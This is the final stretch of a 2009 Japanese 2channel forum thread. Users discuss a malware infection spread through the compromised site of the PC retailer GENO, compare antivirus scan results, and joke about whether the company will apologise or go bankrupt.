短縮サイト全部NGするからいちらんくれよ
974 ヒヨクヒバ(アラバマ州):2009/04/07(火) 11:01:21.40 ID:R3aI5t7A
なんでげのはお詫びもろくにせず平気な顔してんの?リカバリ大変だったんですけど。
ずっとほっといた責任あるんだから賠償しろよ!
975 ヒヤシンス(福岡県):2009/04/07(火) 11:02:12.41 ID:pnDf58uK
>>965
多分セーフじゃないの?
>>802にカスペで検知できるって書いてあったからオンラインスキャンしてみろよ
976 ツルハナシノブ(アラバマ州):2009/04/07(火) 11:02:17.84 ID:SRwyPyJD
>>974
GENO「この機会に、少々高めですが弊社のDSP版Vistaをお買い求めください!」
977 シラン(中国・四国):2009/04/07(火) 11:03:17.06 ID:NBL6O4ex
GENOはウイルスもったままWEB販売現在もやってるの?
在庫減っているんだろうか?
978 モリシマアカシア(東京都):2009/04/07(火) 11:03:21.09 ID:fhtlRrYZ
>>975
おkkk
前スレに再起動かからないとか書いてあったよね
979 キンケイギク(茨城県):2009/04/07(火) 11:04:48.78 ID:qBKuVinG
廃品回収業者ですよ
980 シナノコザクラ(新潟県):2009/04/07(火) 11:05:14.65 ID:SV3w1pXe
xp、ZoneAlarm Antivirus使いで感染した人いる?
タスクマネージャーのプロセスも正常だし、カスペのオンラインスキャンも
share.exeしか検知しなかった。
981 ボロニア・ピンナタ(長屋):2009/04/07(火) 11:05:20.01 ID:izpoIvzz
>>978
マジレスするとバックドア+ボットなんだから再起動とか関係ねえよ
982 ポピー(アラバマ州):2009/04/07(火) 11:05:39.41 ID:/PdA7gPs
>>944
俺そこに面接に行ったけど
マンションの一室でやってる感じ
セキュリティー対策は甘そうな感じだったな
983 トキワヒメハギミツバアケビ(愛知県):2009/04/07(火) 11:06:50.67 ID:QpUgyCdr
>>982
そこで働かなかったのか?
984 ポピー(アラバマ州):2009/04/07(火) 11:08:05.53 ID:/PdA7gPs
>>983
不採用だったw
985 モリシマアカシア(東京都):2009/04/07(火) 11:08:08.48 ID:fhtlRrYZ
今頃責任の投げ合いやってるんだろうねぇ
986 キバナスミレ(catv?):2009/04/07(火) 11:08:16.77 ID:3WjSBk7d
>>953
お前そればっかりだな
987 アメリカフウロ(大阪府):2009/04/07(火) 11:08:49.47 ID:O0HiMAvz
今日謝罪するか否かでこの会社の命運が分かれるな
988 ヒヤシンス(福岡県):2009/04/07(火) 11:09:14.06 ID:pnDf58uK
>>981
じゃあどうしろってんだよ
989 モクレン(石川県):2009/04/07(火) 11:09:20.07 ID:jLm5dvjo
>>966
分かったらさっさと踏んで来いよ
990 モッコウバラ(長屋):2009/04/07(火) 11:09:28.11 ID:KJZSrcAe
>>954
中小の通販サイトなんてこんなところが多いだろうよ。
セキュリティーの知識なんてないし対策もほとんどしていない。
991 ヒメオドリコソウ(コネチカット州):2009/04/07(火) 11:09:53.54 ID:IXgeH8s2
まだだ・・・まだ終わらんぞぉ
992 アメリカフウロ(大阪府):2009/04/07(火) 11:10:37.40 ID:O0HiMAvz
次スレよろ
993 オウレン(埼玉県):2009/04/07(火) 11:11:11.20 ID:J9fZ7s49
感染したとかしないとか心配ならPC使うな

次スレいるのか
994 クロッカス(東日本):2009/04/07(火) 11:11:17.49 ID:v2pFr5JY
マジで悩んでるやつへ

Avast!を導入、ウェブシールド(localhost:12080)を設定するとこのスレとおさらば。
995 セイヨウオダマキ(catv?):2009/04/07(火) 11:11:18.04 ID:6F1yzox8
昨日踏んだけど何ともなかったぞ
996 ショウジョウバカマ(群馬県):2009/04/07(火) 11:11:37.13 ID:fRCKqhzw
1000なら倒産
997 ミツマタ(アラビア):2009/04/07(火) 11:11:43.67 ID:qT0OJ6EK
1000ならウィルス付きPC大特化セール開催
998 モリシマアカシア(東京都):2009/04/07(火) 11:12:17.74 ID:fhtlRrYZ
1000ならみのりん
999 ナノハナ(アラバマ州):2009/04/07(火) 11:12:26.50 ID:p3oa4epO
999
1000 トキワヒメハギミツバアケビ(愛知県):2009/04/07(火) 11:12:30.40 ID:QpUgyCdr
>>984
今考えるとよかったんじゃない?
10011001
このスレッドは1000を超えました。
もう書けないので、新しい職を探して下さい。。。

                            ニュース速報
              http://www.hellowork.go.jp/